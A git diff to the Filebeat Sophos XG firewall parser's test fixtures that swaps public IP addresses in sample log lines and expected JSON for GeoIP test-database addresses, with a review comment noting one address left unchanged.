+ "event.original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion & Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=216.160.83.57 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"",
 "event.outcome": "success",
 "event.severity": "6",
 "event.timezone": "-02:00",
@@ -124,8 +107,8 @@
 "firewall.localgroup.local"
 ],
 "related.ip": [
- "216.58.197.44",
- "5.5.5.15"
+ "216.160.83.57",
+ "216.58.197.44"
 ],
 "server.ip": "216.58.197.44",
 "server.port": 80,
@@ -141,14 +124,16 @@
 "sophos.xg.log_type": "Content Filtering",
 "sophos.xg.message_id": "16002",
 "sophos.xg.priority": "Information",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 51.2993,
- "source.geo.location.lon": 9.491,
- "source.ip": "5.5.5.15",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "source.port": 46719,
 "tags": [
 "forwarded",
@@ -162,15 +147,8 @@
 },
 {
 "@timestamp": "2017-02-01T18:13:29.000-02:00",
- "client.ip": "5.5.5.15",
+ "client.ip": "216.160.83.57",
 "client.port": 49128,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "74.125.130.188",
 "destination.port": 5228,
 "event.action": "denied",
@@ -182,7 +160,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "alert",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"",
+ "event.original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=216.160.83.57 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"",
 "event.outcome": "success",
 "event.severity": "6",
 "event.timezone": "-02:00",
@@ -195,7 +173,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 1224,
+ "log.offset": 1229,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "S110016E28BA631",
@@ -205,7 +183,7 @@
 "firewall.localgroup.local"
 ],
 "related.ip": [
- "5.5.5.15",
+ "216.160.83.57",
 "74.125.130.188"
 ],
 "server.ip": "74.125.130.188",
@@ -228,14 +206,16 @@
 "sophos.xg.priority": "Information",
 "sophos.xg.src_country_code": "DEU",
 "sophos.xg.status": "Deny",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 51.2993,
- "source.geo.location.lon": 9.491,
- "source.ip": "5.5.5.15",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "source.port": 49128,
 "tags": [
 "forwarded",
@@ -246,16 +226,6 @@
 "@timestamp": "2020-05-18T14:38:51.000-02:00",
 "client.ip": "172.17.34.10",
 "client.port": 62851,
- "destination.as.number": 8075,
- "destination.as.organization.name": "Microsoft Corporation",
- "destination.geo.city_name": "Dublin",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "IE",
- "destination.geo.country_name": "Ireland",
- "destination.geo.location.lat": 53.3338,
- "destination.geo.location.lon": -6.2488,
- "destination.geo.region_iso_code": "IE-L",
- "destination.geo.region_name": "Leinster",
 "destination.ip": "13.79.168.201",
 "destination.port": 443,
 "event.action": "allowed",
@@ -279,7 +249,7 @@
 "http.response.status_code": "400",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 1857,
+ "log.offset": 1867,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -324,16 +294,6 @@
 "@timestamp": "2020-05-18T14:38:52.000-02:00",
 "client.ip": "172.16.34.15",
 "client.port": 60471,
- "destination.as.number": 8075,
- "destination.as.organization.name": "Microsoft Corporation",
- "destination.geo.city_name": "Washington",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 38.7095,
- "destination.geo.location.lon": -78.1539,
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "40.90.137.127",
 "destination.port": 443,
 "event.action": "denied",
@@ -359,7 +319,7 @@
 "http.response.status_code": "200",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 2752,
+ "log.offset": 2762,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123457",
@@ -402,18 +362,8 @@
 },
 {
 "@timestamp": "2020-05-18T14:38:53.000-02:00",
- "client.ip": "172.17.34.15",
+ "client.ip": "1.128.3.4",
 "client.port": 65391,
- "destination.as.number": 50881,
- "destination.as.organization.name": "ESET, spol. s r.o.",
- "destination.geo.city_name": "Bratislava",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "SK",
- "destination.geo.country_name": "Slovakia",
- "destination.geo.location.lat": 48.15,
- "destination.geo.location.lon": 17.1078,
- "destination.geo.region_iso_code": "SK-BL",
- "destination.geo.region_name": "Bratislava",
 "destination.ip": "91.228.167.133",
 "destination.port": 80,
 "event.action": "allowed",
@@ -424,7 +374,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=1.128.3.4 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" 
reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"",
 "event.outcome": "success",
 "event.severity": "6",
 "event.timezone": "-02:00",
@@ -437,7 +387,7 @@
 "http.response.status_code": "304",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 3561,
+ "log.offset": 3571,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -447,7 +397,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "172.17.34.15",
+ "1.128.3.4",
 "91.228.167.133"
 ],
 "server.ip": "91.228.167.133",
@@ -467,7 +417,9 @@
 "sophos.xg.log_type": "Content Filtering",
 "sophos.xg.message_id": "16001",
 "sophos.xg.priority": "Information",
- "source.ip": "172.17.34.15",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.ip": "1.128.3.4",
 "source.port": 65391,
 "tags": [
 "forwarded",
@@ -500,7 +452,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 4696,
+ "log.offset": 4703,
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
 "observer.type": "firewall",
@@ -539,13 +491,6 @@
 "@timestamp": "2016-12-02T18:50:20.000-02:00",
 "client.ip": "192.168.73.220",
 "client.port": 37832,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "64.233.189.147",
 "destination.port": 80,
 "event.action": "warned",
@@ -568,7 +513,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 5258,
+ "log.offset": 5265,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "C01001K234RXPA1",
@@ -617,13 +562,6 @@
 "@timestamp": "2016-12-02T18:50:22.000-02:00",
 "client.ip": "192.168.73.220",
 "client.port": 46322,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "64.233.188.94",
 "destination.port": 80,
 "event.action": "allowed",
@@ -646,7 +584,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 5873,
+ "log.offset": 5880,
 "network.transport": "tcp",
 "observer.product": "XG",
 "observer.serial_number": "C01001K234RXPA1",
diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log b/x-pack/filebeat/module/sophos/xg/test/event.log
index d345122ad5a7..8ec039f86e22 100644
--- a/x-pack/filebeat/module/sophos/xg/test/event.log
+++ b/x-pack/filebeat/module/sophos/xg/test/event.log
@@ -1,15 +1,15 @@
 <30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac=
-<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)"
+<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=89.160.20.112 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)"
 <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA timed out before it could be established"
-<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=67.43.156.13 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795 message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795."
 <30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10"
-<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=81.2.69.145 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12
-<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=1.128.3.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298 message="ATP definitions upgraded from 1.0.0297 to 1.0.0298."
 <30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'"
-<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials"
+<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials"
 <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" oldversion=9.17.09 newversion=9.17.10 message="IPS definitions upgraded from 9.17.09 to 9.17.10."
 <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance' message="Scheduled backup to appliance is successful."
 <30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576
diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
index 5fee95e19776..179a156aaf58 100644
--- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
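Review bot: The new side of the IPSec line (time=14:38:58) still carries `localinterfaceip=214.167.51.66` while its peer `remoteinterfaceip` on the same line was moved to 89.160.20.112, so the address replacement in this fixture is only half applied there. The substitutes used across the hunk (1.128.3.4, 67.43.156.13, 81.2.69.145, 89.160.20.112, 175.16.199.1) look like the well-known GeoIP test-database addresses, and the companion expected file in this commit keeps `destination.as.number: 721` for 214.167.51.66 but drops its `destination.geo.*` fields, which suggests enrichment for that address now depends on whatever the test database happens to contain. Moving it into the same test range would make the expected output for this line deterministic and keep a real third-party allocation out of the sample data. Since the fixture format has no comment syntax, noting in the commit message which ranges are used for public addresses would help the next person who adds a sample line.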
@@ -58,20 +58,15 @@
 },
 {
 "@timestamp": "2020-05-18T14:38:58.000-02:00",
- "client.ip": "83.20.132.250",
+ "client.ip": "89.160.20.112",
 "destination.as.number": 721,
 "destination.as.organization.name": "DoD Network Information Center",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "214.167.51.66",
 "event.code": "062511418055",
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=83.20.132.250 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)\"",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=89.160.20.112 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)\"",
 "event.severity": "4",
 "event.timezone": "-02:00",
 "fileset.name": "xg",
@@ -79,7 +74,7 @@
 "input.type": "log",
 "log.level": "warning",
 "log.offset": 597,
- "message": "location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)",
+ "message": "location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
 "observer.type": "firewall",
@@ -89,7 +84,7 @@
 ],
 "related.ip": [
 "214.167.51.66",
- "83.20.132.250"
+ "89.160.20.112"
 ],
 "related.user": [
 "elastic.user@elastic.test.com"
@@ -108,17 +103,17 @@
 "sophos.xg.priority": "Warning",
 "sophos.xg.remotenetwork": "10.84.234.5/32",
 "sophos.xg.status": "Failed",
- "source.as.number": 5617,
- "source.as.organization.name": "Orange Polska Spolka Akcyjna",
- "source.geo.city_name": "Elblag",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "PL",
- "source.geo.country_name": "Poland",
- "source.geo.location.lat": 54.172,
- "source.geo.location.lon": 19.4195,
- "source.geo.region_iso_code": "PL-28",
- "source.geo.region_name": "Warmia-Masuria",
- "source.ip": "83.20.132.250",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "source.user.name": "elastic.user@elastic.test.com",
 "tags": [
 "forwarded",
@@ -164,7 +159,7 @@
 },
 {
 "@timestamp": "2020-05-18T14:39:00.000-02:00",
- "client.ip": "83.9.140.96",
+ "client.ip": "67.43.156.13",
 "event.category": [
 "authentication"
 ],
@@ -172,7 +167,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=83.9.140.96 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=67.43.156.13 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=",
 "event.outcome": "success",
 "event.severity": "6",
 "event.timezone": "-02:00",
@@ -194,7 +189,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "83.9.140.96"
+ "67.43.156.13"
 ],
 "related.user": [
 "elastic.user@elastic.test.com"
@@ -209,17 +204,13 @@
 "sophos.xg.message_id": "17704",
 "sophos.xg.priority": "Information",
 "sophos.xg.status": "Successful",
- "source.as.number": 5617,
- "source.as.organization.name": "Orange Polska Spolka Akcyjna",
- "source.geo.city_name": "August\u00f3w",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "PL",
- "source.geo.country_name": "Poland",
- "source.geo.location.lat": 53.845,
- "source.geo.location.lon": 22.985,
- "source.geo.region_iso_code": "PL-20",
- "source.geo.region_name": "Podlasie",
- "source.ip": "83.9.140.96",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.name": "elastic.user@elastic.test.com",
 "tags": [
 "forwarded",
@@ -247,7 +238,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 2080,
+ "log.offset": 2081,
 "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -285,7 +276,7 @@
 "host.name": "some_other_host.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 2428,
+ "log.offset": 2429,
 "message": "Lease 192.168.110.10 expired",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123457",
@@ -312,7 +303,7 @@
 },
 {
 "@timestamp": "2020-05-18T14:39:03.000-02:00",
- "client.ip": "217.250.157.135",
+ "client.ip": "81.2.69.145",
 "event.category": [
 "authentication"
 ],
@@ -320,7 +311,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=217.250.157.135 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=81.2.69.145 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=",
 "event.outcome": "success",
 "event.severity": "6",
 "event.timezone": "-02:00",
